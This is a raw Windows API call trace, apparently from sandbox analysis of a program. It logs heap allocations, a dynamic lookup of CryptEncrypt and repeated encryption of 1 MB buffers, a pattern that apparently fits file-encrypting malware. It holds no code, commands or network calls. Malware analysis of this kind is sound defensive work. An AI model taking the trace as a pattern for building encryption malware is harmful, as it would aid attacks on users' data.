[0176.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a88 [0176.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0176.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0176.194] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543f0 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0176.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0176.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0176.195] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0176.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0176.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0176.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0176.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0176.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0176.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0176.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0176.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0176.201] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0176.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0176.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0176.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0176.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0176.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0176.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0176.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x422f020 | out: hHeap=0x970000) returned 1 [0176.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0176.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.500] DefWindowProcW (hWnd=0x402c2, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0176.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.501] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c20 [0176.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0176.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0176.826] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0176.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0176.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54490 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0176.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0176.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0176.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0176.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0176.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0176.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0176.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0176.832] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x411d020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x411d020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0176.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 